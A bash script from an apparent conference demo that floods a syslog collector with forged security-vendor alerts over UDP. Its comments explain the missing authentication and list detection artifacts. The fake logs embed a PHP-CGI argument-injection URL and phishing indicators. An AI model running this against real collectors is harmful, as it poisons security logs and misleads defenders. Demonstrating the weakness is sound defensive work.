
Syslog Spoof - GrrCON Demo - Charles Herring

Oct 24th, 2019
#!/bin/bash
# Syslog spoofing demo (GrrCON). For ten seconds, send four fabricated
# security-product log lines per loop pass to a syslog collector over plain
# UDP/514. The point being demonstrated: UDP syslog carries no sender
# authentication or integrity protection, so a collector/SIEM ingests whatever
# source address and payload it is handed.
#
# Artifacts a defender can key on, all visible in the code below:
#   - every message timestamp is pinned 8 hours in the past (three date calls),
#     so message time and collector ingest time disagree by a fixed offset;
#   - the "attacker" address is a random 10.x.x.x value regenerated each pass;
#   - four different vendor formats (SEP, ASA, FireEye CEF, TrapX CEF) arrive
#     from one sending host in a tight burst of identical structure.
#
# Requires GNU date (for -d '8 hours ago') and a netcat that accepts -u / -w.

# Three renderings of the same back-dated time, one per timestamp layout used
# in the message templates below.
timestamp_short=$(date -d '8 hours ago' +"%b %d %T")
timestamp_medium=$(date -d '8 hours ago' +"%b %d %Y %T")
timestamp_long=$(date -d '8 hours ago' +"%B %d %Y %T")
# Destination syslog collector ("streamer"); hard-coded for the demo.
streamerip=172.31.4.37
printf "Spoofing messages as fast as possible for 10 seconds .\n"
# COUNTER = messages sent (4 per pass); LIES = loop passes, i.e. the number of
# spoofed source addresses used. `end` is derived from bash's SECONDS counter.
COUNTER=0
end=$((SECONDS+10))
LIES=0
while [ $SECONDS -lt $end ]; do
    # Fresh random 10.0.0.0/8 address each pass; each octet lands in 1..254.
    attacker="10.$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 ))"
    # 1) Symantec Endpoint Protection IPS event, syslog PRI <50>. The
    #    backslashes in the Windows path are literal: they are not escapes
    #    inside double quotes and bash's builtin echo leaves them alone
    #    (unless xpg_echo is set). `-w 0` caps how long each nc lingers;
    #    exact semantics differ between netcat variants.
    echo -n "<50>${timestamp_short} acmesep SymantecServer: ACMELAPTOP143,[SID: 26825] Web Attack: Plesk Command Injection attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\SKYPE\PHONE\SKYPE.EXE,Local: ${attacker},Local: 000000000000,Remote: ,Remote: 192.168.1.5,Remote: 000000000000,Inbound,TCP,Intrusion ID: 0,Begin: 2018-01-09 11:31:27,End: 2018-01-09 11:31:27,Occurrences: 1,Application: C:/PROGRAM FILES (X86)/SKYPE/PHONE/SKYPE.EXE,Location: Default,User: jdoe,Domain: ADLOCAL,Local Port 80,Remote Port 53590,CIDS Signature ID: 26825,CIDS Signature string: Web Attack: Plesk Command Injection,CIDS Signature SubID: 72137,Intrusion URL: localhost/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n,Intrusion Payload URL:" | nc -u -w 0 "${streamerip}" 514
    # 2) Cisco ASA inbound-deny message, PRI <162>.
    echo -n "<162>${timestamp_medium}: %ASA-2-106006: Deny inbound UDP from ${attacker}/15407 to 192.168.1.5/5060 on interface outside" | nc -u -w 0 "${streamerip}" 514
    # 3) FireEye eMPS alert in CEF, PRI <161>. The "\=" sequences survive
    #    double quotes as a literal backslash followed by '=' (CEF-style
    #    escaping of '=' inside an extension value).
    echo -n "<161>fenotify-2587809.alert: CEF:0|FireEye|eMPS|8.0.2.682549|MO|malware-object|4|rt=${timestamp_short} UTC cn2Label=sid cn2=88970333 request=hxxps://capitanes.org.ar/document.htm act=notified dvchost=COSFireEyeEX.acme.com cs4Label=link cs4=https://192.168.1.5/emps/eanalysis?e_id\=5412033&type\=url&lms_iden\=0C:C4:7A:DA:FB:D6 duser=jdoe@acme.com cn1Label=vlan cn1=0 externalId=2587809 dvc=${attacker} suser=badguy@evil.com msg=DM2PR11MB0335C8A2D6B4EDF150793468D9100@evil.prod.outlook.com cs1Label=sname cs1=Phish.LIVE.DTI.URL start=Jan 09 2018 15:59:22 UTC cat=retro-detection devicePayloadId=2e8dd72f-97a8-4863-baab-805ead82feee fileType=exe flexString2Label=subject flexString2=[EXTERNAL] Invoices for approval" | nc -u -w 0 "${streamerip}" 514
    # 4) TrapX "Network Scan Detected" event in CEF, PRI <81>.
    echo -n "<81>${timestamp_long} 127.0.1.1 CEF:0|TrapX|TSOC|6.0|ID:3|Intelligence Event - Network Scan Detected|4|rt=${timestamp_short} src=${attacker} deviceNtDomain=AcmedTrapxApp001_NIS dpt=256 cs5Label=company cs5=N.America proto=TCP deviceExternalId=279 dst=192.168.1.5 spt=45774 cat=Network Scan Detected devicePayloadId=NO externalId=11671827" | nc -u -w 0 "${streamerip}" 514
    COUNTER=$((COUNTER + 4))
    LIES=$((LIES + 1))
done
# NOTE(review): the counters are expanded inside printf's format string.
# Harmless here because both are integers, but the idiomatic form is
# printf '%s spoofed messages sent concerning %s spoofed IP \n' "$COUNTER" "$LIES"
printf "$COUNTER spoofed messages sent concerning $LIES spoofed IP \n"